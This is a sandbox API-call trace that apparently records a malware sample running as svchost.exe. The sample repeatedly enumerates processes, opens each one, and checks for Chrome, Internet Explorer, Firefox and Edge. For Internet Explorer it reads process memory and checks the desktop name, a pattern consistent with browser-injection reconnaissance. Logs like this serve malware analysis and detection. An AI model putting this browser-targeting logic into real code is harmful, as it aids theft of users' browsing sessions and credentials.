	[0248.465] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0248.465] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x9be4
	[0248.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.466] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0248.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.466] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0248.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.466] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0248.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.466] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.467] NtQueryInformationProcess (in: ProcessHandle=0x9be4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0248.467] ReadProcessMemory (in: hProcess=0x9be4, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0248.467] ReadProcessMemory (in: hProcess=0x9be4, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0248.467] ReadProcessMemory (in: hProcess=0x9be4, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0248.467] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0248.467] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0248.468] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x9be8
	[0248.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.468] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0248.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.468] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.469] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0248.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.469] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.469] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0248.470] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x9bec
	[0248.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.470] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0248.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.471] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.471] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0248.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.472] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.472] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.473] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x9bf0
	[0248.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.473] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.473] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.474] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.474] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.474] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.475] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.476] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x9bf4
	[0248.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.476] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.476] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.476] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.477] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.477] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.478] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x9bf8
	[0248.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.478] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.478] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.479] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.479] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.479] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0248.480] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x9bfc
	[0248.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.480] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0248.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.481] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.481] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0248.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.481] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.481] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.482] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x9c00
	[0248.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.482] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.483] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.483] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.483] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.484] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.484] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x9c04
	[0248.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.485] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.485] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.485] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.486] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.486] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0248.486] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x9c08
	[0248.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.487] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0248.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.487] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.487] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0248.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.487] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.488] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0248.488] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x9c0c
	[0248.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.488] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.489] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.489] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.489] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.490] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0248.491] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x9c10
	[0248.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.491] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0248.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.491] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.491] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0248.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.491] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.492] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.492] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x9c14
	[0248.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.493] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.494] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.494] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.494] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.494] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0248.495] CloseHandle (hObject=0x4fd0) returned 1
	[0248.495] Sleep (dwMilliseconds=0x64) 
	[0248.603] GetCurrentProcessId () returned 0x110
	[0248.603] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0248.607] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0248.609] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0248.610] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0248.612] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x9c18
	[0248.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.612] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0248.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.612] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.613] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0248.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.613] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.614] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0248.615] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x9c1c
	[0248.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.616] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0248.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.616] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.617] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0248.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.617] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.617] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0248.619] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x9c20
	[0248.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.619] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0248.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.619] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.620] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0248.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.620] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.620] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0248.621] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x9c24
	[0248.621] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.621] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0248.621] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.621] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.622] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0248.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.622] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.622] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0248.623] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x9c28
	[0248.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.623] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0248.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.623] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.624] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0248.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.624] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.624] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0248.625] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x9c2c
	[0248.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.625] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0248.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.626] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.626] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0248.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.626] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.626] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0248.627] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x9c30
	[0248.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.627] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0248.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.628] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.628] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0248.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.628] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.628] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0248.629] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x9c34
	[0248.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.629] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0248.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.630] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.630] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0248.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.630] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.630] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.631] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x9c38
	[0248.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.631] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.631] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.632] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.632] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.632] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.633] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x9c3c
	[0248.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.633] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
